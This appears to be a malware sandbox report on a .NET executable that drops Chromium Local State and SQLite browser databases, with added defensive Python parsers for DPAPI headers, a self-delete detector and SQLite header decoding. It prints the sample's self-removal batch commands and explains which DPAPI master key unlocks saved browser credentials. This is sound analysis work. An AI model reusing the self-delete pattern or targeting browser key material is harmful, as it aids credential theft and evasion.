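The JSON previewed above has the layout of a Chromium Local State file: its os_crypt section holds the DPAPI-protected key material that the browser uses for saved passwords and cookies, and it is the first thing credential stealers aimed at Chromium browsers read. The helper below is an added example for this report, not code from Joe Sandbox or from the analysed sample. It walks the os_crypt section, recognises values that base64-decode to a DPAPI blob (4-byte version 1 followed by the DPAPI provider GUID) and reports the master-key version and GUID from the blob header without decrypting anything. The sample input is constructed: encrypted_key is built from a hypothetical master-key GUID, and app_bound_fixed_data is the 32-character prefix visible in the preview above, which decodes to a DPAPI header with no master-key GUID because it is truncated.

```python
"""Find DPAPI-protected values in a Chromium "Local State" style JSON file.

Added example for this report, not code from Joe Sandbox or the analysed sample.
Nothing is decrypted: the script only recognises and parses DPAPI blob headers.
"""
from __future__ import annotations

import base64
import json
import struct
import uuid

# Provider GUID that every DPAPI CryptProtectData blob carries after its 4-byte version.
DPAPI_PROVIDER_GUID = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb"
# Chromium writes os_crypt.encrypted_key as base64("DPAPI" + blob).
CHROMIUM_KEY_TAG = b"DPAPI"


def parse_dpapi_header(blob: bytes) -> dict | None:
    """Return version, provider and master-key fields if blob starts like a DPAPI blob."""
    if len(blob) < 24:
        return None
    version = struct.unpack_from("<I", blob, 0)[0]
    provider = str(uuid.UUID(bytes_le=blob[4:20]))
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        return None
    header = {
        "version": version,
        "provider_guid": provider,
        "masterkey_version": struct.unpack_from("<I", blob, 20)[0],
        "masterkey_guid": None,  # names the user master key needed to unwrap the blob
    }
    if len(blob) >= 40:
        header["masterkey_guid"] = str(uuid.UUID(bytes_le=blob[24:40]))
    return header


def find_dpapi_values(local_state_text: str) -> list[dict]:
    """Report every os_crypt value that base64-decodes to a DPAPI blob."""
    state = json.loads(local_state_text)
    hits = []
    for name, value in state.get("os_crypt", {}).items():
        if not isinstance(value, str):
            continue
        try:
            raw = base64.b64decode(value, validate=True)
        except ValueError:  # not base64, or cut short as in a truncated preview
            continue
        tagged = raw.startswith(CHROMIUM_KEY_TAG)
        header = parse_dpapi_header(raw[len(CHROMIUM_KEY_TAG):] if tagged else raw)
        if header:
            hits.append({"key": name, "chromium_tag": tagged, **header})
    return hits


# Constructed sample, not the dropped file itself: encrypted_key is built from a
# hypothetical master-key GUID; app_bound_fixed_data is the 32-character prefix
# that is visible in the report's preview of the dropped file.
_HYPOTHETICAL_MASTERKEY = uuid.UUID("11111111-2222-3333-4444-555555555555")
_FAKE_BLOB = (struct.pack("<I", 1) + uuid.UUID(DPAPI_PROVIDER_GUID).bytes_le
              + struct.pack("<I", 1) + _HYPOTHETICAL_MASTERKEY.bytes_le + b"\x00" * 16)
SAMPLE_LOCAL_STATE = json.dumps({
    "browser": {"first_run_finished": True},
    "os_crypt": {
        "audit_enabled": True,
        "encrypted_key": base64.b64encode(CHROMIUM_KEY_TAG + _FAKE_BLOB).decode(),
        "app_bound_fixed_data": "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA",
    },
})

if __name__ == "__main__":
    for hit in find_dpapi_values(SAMPLE_LOCAL_STATE):
        print(hit)
```

The master-key GUID is the useful triage output: it tells you which file under the user's Protect directory the stealer would need (or would need to brute-force the user's password for) to unwrap the browser key, which is why the blob itself is harmless in a report but the key it protects is not.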
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):44137
                                                                                        Entropy (8bit):6.0906888050947225
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMEcwuF9hDO6vP6O9Htbzy70FqHoPFkGoup1Xl3jC:z/Ps+wsI7ynEd6Jtbz8hu3VlXr4CRoX
                                                                                        MD5:6F8FFE68CBDE7984212AC28FB4502998
                                                                                        SHA1:04A8B89447F7AFBC4ADF55A3CCEDF082FA58FF84
                                                                                        SHA-256:871374A34C6A3799519FCCF50B91C3DFF7F543710B2F7EEF5003618E84032C31
                                                                                        SHA-512:72834E16907E2B0E3637F7A969978E06E52CC660754F3E734585B5D3FDCBD02F99076757C572C595FA322E99C286A66ED95ABAEA791F98A9FA77E815052CF85A
                                                                                        Malicious:false
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"

                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):107
                                                                                        Entropy (8bit):5.24221801046739
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:HFTEOuMJcFKsoWwBRZDEXEPUWJRWfVXbn:yOuMJNWweoNJAdLn
                                                                                        MD5:68BAA8FFE82EC46B333B016CD528507B
                                                                                        SHA1:07F50DF9031093C3C2B6E068EFBFB42A72249FBF
                                                                                        SHA-256:139D9ED72B18ACC52382C5C0FCA7DDA99237E1DE794A4F0F9CF6FFDA44B38368
                                                                                        SHA-512:763254419A318617F34FDD5D141112AACE2C37E83233D9F18F42A167CF0DE493FDF57E87B36073DE174CEA00729087D623DFB10A387C79257F1ED44E492C8C3E
                                                                                        Malicious:false
                                                                                        Preview:chcp 65001..TaskKill /F /IM 1352..Timeout /T 2 /Nobreak..Del /ah "C:\Users\user\Desktop\zyEDYRU0jw.exe"..
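The batch file above is the sample's self-removal step: switch the console to UTF-8, try to kill a process, wait two seconds, then delete the sample's own executable. Two details are worth checking rather than eyeballing. TaskKill /F /IM 1352 passes a PID where /IM expects an image name (a PID belongs after /PID), so the kill line fails and the script simply falls through to the delete. Del /ah restricts the delete to files carrying the hidden attribute, so it only succeeds if the executable was marked hidden beforehand. The detector below is an added example for this report, not code from Joe Sandbox or from the sample; it scans batch text for the kill / wait / delete sequence and reports both points. The input is reconstructed from the preview, in which Joe Sandbox prints each CR and LF as a dot, so every ".." is one CRLF line ending.

```python
"""Detect the kill / wait / delete self-removal pattern in a dropped batch file.

Added example for this report, not code from Joe Sandbox or the analysed sample.
"""
import re

# Constructed from the preview on this page: Joe Sandbox prints each CR and LF as a
# dot, so every ".." in the preview is one CRLF line ending.
SAMPLE_BAT = (
    "chcp 65001\r\n"
    "TaskKill /F /IM 1352\r\n"
    "Timeout /T 2 /Nobreak\r\n"
    "Del /ah \"C:\\Users\\user\\Desktop\\zyEDYRU0jw.exe\"\r\n"
)

_KILL = re.compile(r"^\s*taskkill\b(.*)$", re.I)
_KILL_TARGET = re.compile(r"/(im|pid)\s+(\S+)", re.I)
_WAIT = re.compile(r"^\s*timeout\b.*?/t\s+(\d+)", re.I)
_DEL = re.compile(r'^\s*(?:del|erase)\b((?:\s+/[\w:]+)*)\s+"?([^"]+?)"?\s*$', re.I)


def analyse_self_delete(bat_text: str) -> dict:
    """Return kill targets, delay, delete targets, notes and a verdict for a batch script."""
    report = {"kills": [], "delay_seconds": None, "deletes": [], "notes": [],
              "is_self_delete": False}
    for line in bat_text.splitlines():
        m = _KILL.match(line)
        if m:
            for switch, target in _KILL_TARGET.findall(m.group(1)):
                report["kills"].append((switch.upper(), target))
                if switch.upper() == "IM" and target.isdigit():
                    # /IM takes an image name such as foo.exe; a PID belongs after /PID,
                    # so a numeric /IM never matches and taskkill just reports an error.
                    report["notes"].append(
                        f"taskkill /IM {target}: numeric image name, the kill fails and "
                        "execution falls through to the delete")
            continue
        m = _WAIT.match(line)
        if m:
            report["delay_seconds"] = int(m.group(1))
            continue
        m = _DEL.match(line)
        if m:
            flags = [f.lower() for f in m.group(1).split()]
            report["deletes"].append({"path": m.group(2), "flags": flags})
            if "/ah" in flags:
                # /ah selects files that carry the hidden attribute, so the delete only
                # succeeds if the target was marked hidden first.
                report["notes"].append(f"del /ah {m.group(2)}: target must be hidden")
    deletes_exe = any(d["path"].lower().endswith(".exe") for d in report["deletes"])
    staged = bool(report["kills"]) or report["delay_seconds"] is not None
    report["is_self_delete"] = deletes_exe and staged
    return report


if __name__ == "__main__":
    for key, value in analyse_self_delete(SAMPLE_BAT).items():
        print(f"{key}: {value}")
```

The verdict deliberately requires a kill or a wait step in front of the delete: a bare del of an executable is common in installers, while the staged form exists to get around the lock the running image holds on its own file.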
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):98304
                                                                                        Entropy (8bit):0.08235737944063153
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):294912
                                                                                        Entropy (8bit):0.08438200565341271
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                        MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                        SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                        SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                        SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):40960
                                                                                        Entropy (8bit):0.8553638852307782
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.8439810553697228
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):1.136413900497188
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):1.136413900497188
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):1.136413900497188
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):51200
                                                                                        Entropy (8bit):0.8746135976761988
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.6732424250451717
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                        Category:dropped
                                                                                        Size (bytes):196608
                                                                                        Entropy (8bit):1.121297215059106
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.421773873160502
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:DSvfpi6ceLP/9skLmb0OTKWSPHaJG8nAgeMZMMhA2fX4WABlEnNS0uhiTw:OvloTKW+EZMM6DFy403w
                                                                                        MD5:F19EEF4E1D01B4D32389DDA0899535CC
                                                                                        SHA1:589A4DECA9BA8CF63B89A1303960BC92DE394EA3
                                                                                        SHA-256:E5D01CA74809505D7D1CBD8DA6FA3EFF9EBF49B3D493D8040C023AD89E60096F
                                                                                        SHA-512:DAD5BCC59E3BB01CE04E148F3DF26A292355AC8AFB1D639D87F251DD0EF7486FEB84F941461D3D67198CB4F12B20CA1BB441AF9B20ED4E8D39F341A4C6EFA045
                                                                                        Malicious:false
                                                                                        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....P...............................................................................................................................................................................................................................................................................................................................................e.#........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
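The "File Type" line of each dropped SQLite database above (page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8, SQLite version 3042000) is decoded from the file's 100-byte header. The parser below reproduces that decoding so the values can be checked on any copied browser database without loading it into SQLite. This is an added example, not code from the sandbox or from the sample; the header it parses is constructed from the values the report prints, not bytes taken from the sample's dropped file.

```python
import struct

# Constants from the SQLite 3 file-format specification.
SQLITE_MAGIC = b"SQLite format 3\x00"
TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


class NotSQLiteError(ValueError):
    """The first 16 bytes are not the plaintext SQLite magic."""


def is_plaintext_sqlite(data: bytes) -> bool:
    """Quick magic check; False for encrypted (e.g. SQLCipher) or unrelated files."""
    return data[:16] == SQLITE_MAGIC


def parse_sqlite_header(data: bytes) -> dict:
    """Decode the 100-byte database header (all integers are big-endian).

    Offsets used: 16 page size (1 encodes 65536), 18/19 write/read format
    versions, 24 file change counter, 28 size in pages, 40 schema cookie,
    44 schema format, 56 text encoding, 92 version-valid-for,
    96 SQLITE_VERSION_NUMBER of the library that last wrote the file.
    """
    if len(data) < 100:
        raise ValueError("need at least the 100-byte header")
    if not is_plaintext_sqlite(data):
        raise NotSQLiteError("no SQLite magic: not a database, or an encrypted one")
    raw_page_size = struct.unpack_from(">H", data, 16)[0]
    page_size = 65536 if raw_page_size == 1 else raw_page_size
    if page_size < 512 or page_size & (page_size - 1):
        raise ValueError(f"page size {page_size} is not a power of two in 512..65536")
    change_counter, db_pages = struct.unpack_from(">II", data, 24)
    schema_cookie, schema_format = struct.unpack_from(">II", data, 40)
    encoding = struct.unpack_from(">I", data, 56)[0]
    version_valid_for, sqlite_version = struct.unpack_from(">II", data, 92)
    return {
        "page_size": page_size,
        "write_version": data[18],          # 1 = rollback journal, 2 = WAL
        "read_version": data[19],
        "file_change_counter": change_counter,
        "database_pages": db_pages,
        # Per the spec the in-header size is trustworthy only when it is
        # non-zero and the change counter equals version-valid-for.
        "header_size_valid": db_pages != 0 and change_counter == version_valid_for,
        "header_file_size": page_size * db_pages,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "text_encoding": TEXT_ENCODINGS.get(encoding, f"unknown({encoding})"),
        "version_valid_for": version_valid_for,
        "sqlite_version": sqlite_version,
    }


def describe(hdr: dict) -> str:
    """Render the header in the wording the sandbox report uses for File Type."""
    return (
        f"SQLite 3.x database, last written using SQLite version {hdr['sqlite_version']}, "
        f"page size {hdr['page_size']}, file counter {hdr['file_change_counter']}, "
        f"database pages {hdr['database_pages']}, cookie 0x{hdr['schema_cookie']:x}, "
        f"schema {hdr['schema_format']}, {hdr['text_encoding']}, "
        f"version-valid-for {hdr['version_valid_for']}"
    )


def build_header(page_size=2048, change_counter=8, db_pages=89, schema_cookie=0x36,
                 schema_format=4, encoding=1, version_valid_for=8,
                 sqlite_version=3042000) -> bytes:
    """Constructed 100-byte header: a fixture built from the values the report
    prints for the dropped file, not bytes taken from the sample itself."""
    hdr = bytearray(100)
    hdr[0:16] = SQLITE_MAGIC
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18] = hdr[19] = 1                      # legacy rollback-journal format
    hdr[21], hdr[22], hdr[23] = 64, 32, 32     # payload fractions fixed by the format
    struct.pack_into(">II", hdr, 24, change_counter, db_pages)
    struct.pack_into(">II", hdr, 40, schema_cookie, schema_format)
    struct.pack_into(">I", hdr, 56, encoding)
    struct.pack_into(">II", hdr, 92, version_valid_for, sqlite_version)
    return bytes(hdr)


if __name__ == "__main__":
    header = parse_sqlite_header(build_header())
    print(describe(header))
    print("header size:", header["header_file_size"], "bytes; report shows 196608 on disk")
```

Two things worth noticing when running it against the report's numbers: the header claims 89 pages of 2048 bytes (182272 bytes) while the dropped file is 196608 bytes (96 pages); because the change counter and version-valid-for agree, the header count is the authoritative one and the tail is slack the engine ignores. And a failed magic check on a copied browser database does not mean the copy is corrupt: SQLCipher-style encrypted databases carry no plaintext magic, which is why the check is separated from the parser.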
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):5.781938114168424
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        File name:zyEDYRU0jw.exe
                                                                                        File size:171'008 bytes
                                                                                        MD5:41d3660b5321768122f4c25ac9868fc3
                                                                                        SHA1:d42e3c5fc24e309581819cba723b14c3c247d824
                                                                                        SHA256:c43a34e78ba6913551af41857fb63a3545acd6a9248e8a4de884988b3ccf895d
                                                                                        SHA512:e02797980f11075715499878f06cfcb71a12da81f8b62f7c30deb31b831137472c450b95f5ebe9349a4205041b6f65c6468d217c2fa36a91902f75c7d5aed549
                                                                                        SSDEEP:3072:oBYHQAFbcjCdDK8l8wqxrytfAndlzFvxHebZ5h2jgSw6KXwApEnB:oBYHjajw5lB2LzdxHeblqk6K
                                                                                        TLSH:27F34C6833FD4A19F3BF4A3998B4919046BAF9A56933D75D598030FC2A327C1DA10B73
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5............."...0.................. ........@.. ....................................`................................
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x42a602
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                         Time Stamp:0xB880F835 [Fri Feb 3 01:58:13 2068 UTC] (a date in the future: compilers building .NET assemblies deterministically, the .NET SDK default, store a content hash in this field, so it is not a build time)
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                         Instruction (entry-point disassembly)
                                                                                         Note: this is a .NET assembly, so the only native code at the entry point is the first instruction, a jmp through the IAT slot at 0x402000 (RVA 0x2000, the 8-byte IAT directory listed below) to mscoree!_CorExeMain; the 12-byte .reloc section holds the single base relocation for that operand. Everything after the jmp is a linear sweep over CLR metadata bytes and is not code that executes.
                                                                                        jmp dword ptr [00402000h]
                                                                                        push ecx
                                                                                        hlt
                                                                                        cmpsd
                                                                                        push eax
                                                                                        jle 00007F4AF471BFC3h
                                                                                        push ebx
                                                                                        sbb dl, byte ptr [edi]
                                                                                        movsb
                                                                                        ret
                                                                                        cmp ah, byte ptr [edi]
                                                                                        pop esi
                                                                                        xchg eax, esi
                                                                                        cmp ebp, dword ptr [ebx-62E03495h]
                                                                                        inc ebp
                                                                                        int1
                                                                                        lodsb
                                                                                        cli
                                                                                        pop eax
                                                                                        stosd
                                                                                        dec ebx
                                                                                        jecxz 00007F4AF471BF85h
                                                                                        xchg eax, ebx
                                                                                        and byte ptr [eax], dh
                                                                                        cli
                                                                                        push ebp
                                                                                        lodsd
                                                                                        jbe 00007F4AF471BFEFh
                                                                                        test byte ptr [eax-0A6E8934h], 00000002h
                                                                                        dec esp
                                                                                        and eax, FCD7E54Fh
                                                                                        lds ebp, fword ptr [edx]
                                                                                        retf
                                                                                        xlatb
                                                                                        xor eax, 62B58044h
                                                                                        mov dword ptr [5AB1DE8Fh], eax
                                                                                        dec ecx
                                                                                        and eax, 45671BBAh
                                                                                        jmp far E1C0h : FE5D980Eh
                                                                                        ret
                                                                                        das
                                                                                        jne 00007F4AF471BF84h
                                                                                        or dword ptr [eax+esi*8+12h], A397468Dh
                                                                                        imul edx, ebx, F9h
                                                                                        mov byte ptr [ebx], FFFFFF8Fh
                                                                                        pop edi
                                                                                        out 15h, eax
                                                                                        xchg eax, edx
                                                                                        pushfd
                                                                                        xchg eax, ebp
                                                                                        mov edi, 95EB7A6Dh
